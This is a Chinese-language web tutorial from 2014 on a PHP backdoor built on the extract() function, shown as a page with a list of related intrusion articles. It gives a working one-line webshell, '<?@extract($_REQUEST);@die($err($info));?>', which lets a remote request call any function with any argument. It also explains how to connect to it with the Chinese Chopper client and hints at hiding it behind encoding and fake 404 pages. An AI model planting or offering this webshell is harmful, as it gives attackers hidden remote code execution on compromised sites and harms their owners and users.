手机
当前位置:查字典教程网 > >脚本攻防 >ODOR1–PHP extract 后门使用方法
ODOR1–PHP extract 后门使用方法
摘要:PHPextract函数后门Auth:winger[L4F][CGH]Date:2014-02-24今天介绍的是一种新的PHP后门:extr...

PHP extract 函数后门

Auth:winger[L4F][CGH]

Date: 2014-02-24

今天介绍的是一种新的PHP后门: extract 函数后门.

复制代码代码如下:

extract

(PHP 4, PHP 5)

extract — 从数组中将变量导入到当前的符号表

int extract ( array &$var_array [, int $extract_type = EXTR_OVERWRITE [, string $prefix = NULL ]] )

本函数用来将变量从数组中导入到当前的符号表中.

具体应用:

1: PHP中extract函数各种用法介绍

2: PHP extract() 函数

3: 官方文档

4: php-backdoors-hidden-with-clever-use-of-extract-function

接下来操刀上马:)

服务端代码:

复制代码代码如下:

<?@extract($_REQUEST);@die($err($info));?>

ODOR1–PHP extract 后门使用方法1

菜刀使用附加数据提交功能,"编辑shell-->配置",填入下面的内容:

ODOR1–PHP extract 后门使用方法2

ODOR1–PHP extract 后门使用方法3

最后加上各种编码,标签和404....你懂得( ‵▽′)ψ

【ODOR1–PHP extract 后门使用方法】相关文章:

分享PHP场景中getshell防御思路

使用爬虫采集网站时,解决被封IP的几种方法

脚本入侵-上传漏洞总结篇(臭小子)

PHP Webshell 下的端口反弹方法

入侵中国红客联盟过程分析

DedeCms V5.6 本地包含里的上传漏洞(可是那包含漏洞已经公布)

XSS 攻击常用脚本

浅说双引号被过滤时一句话的插入与防范

PHP Mysql 密码暴力破解代码,本机暴力破解 3306 端口

Phpcms本地包含漏洞导致的写shell漏洞和删除任意文件漏洞

精品推荐
分类导航